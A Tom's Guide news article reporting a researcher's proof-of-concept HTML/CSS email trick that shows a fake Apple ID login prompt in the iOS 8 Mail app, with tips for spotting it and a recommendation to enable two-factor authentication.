iPhone Phishing Attack Could Steal Apple Accounts

As always, be glad that security researchers are better at finding flaws than cybercriminals are. A new proof-of-concept exploit demonstrates an extremely clever, and potentially devastating, phishing scam on iPhones and iPads. Just by receiving an e-mail, iOS users — even very savvy ones — could fall victim to a convincing, but fake login screen that would steal the username and password for their Apple accounts.

The British tech blog The Register spoke with Jan Souček, an Ernst and Young security consultant based in Prague, who explained that he fooled the Mail app built into iOS 8 with a tool of his own creation called iOS-Mail.app-inject-kit. Souček's tool wraps email messages in 20 lines of deceptive Web formatting that, when viewed on an iOS device, brings up a fake Apple ID login screen that looks perfectly real.

MORE: Best Identity-Theft Protection

Souček rooted out the vulnerability and told Apple about it back in January, but he said Apple has declined to patch the issue. So he decided to take the flaw public. Unlike many phishing pop-ups, which require JavaScript, Souček created the Mail.app phishing tool using only HTML and its formatting language CSS, which iOS reads and parses by default.

What really makes the Mail.app trick dangerous is that it replicates predictable iOS behavior. iOS 8 really does ask users to sign in to confirm their identification periodically, especially when using the built-in Mail app. Users could delete every suspicious e-mail that comes their way, but still end up handing over their Apple account credentials -- and their iTunes Store balances, iCloud accounts and iPhone photo backups -- to phishers without ever knowing it.

There is one easy way to detect Souček's phishing tool: press the Cancel button when the login prompt appears. With real iOS notifications, pressing Cancel will cause the prompt to reappear until you log in. With HTML/CSS modifications, even very clever ones, pressing Cancel will cause the prompt to disappear. If Mail asks you to log in, pressing Cancel once couldn't hurt, and only costs you about a second.

Those who do fall for such tricks will be protected from Apple account takeovers if they've enabled two-factor authentication. With that feature turned on, Apple will send a numeric code via text message or Find My iPhone/iPad message to a second device belonging to the registered user, and the user must enter the code into the first device to log in.

Keep in mind that the Mail.app phish has never been seen in the wild, and now that Souček has made it public, Apple will probably patch it soon. It's just a good reminder that while 99 percent of phishing scams are transparent and easy-to-spot, there's always that outlier that could throw even tech-savvy users for a loop.

Marshall Honorof is a senior writer for Tom's Guide. Contact him at mhonorof@tomsguide.com. Follow him @marshallhonorof. Follow us @tomsguide, on Facebook and on Google+.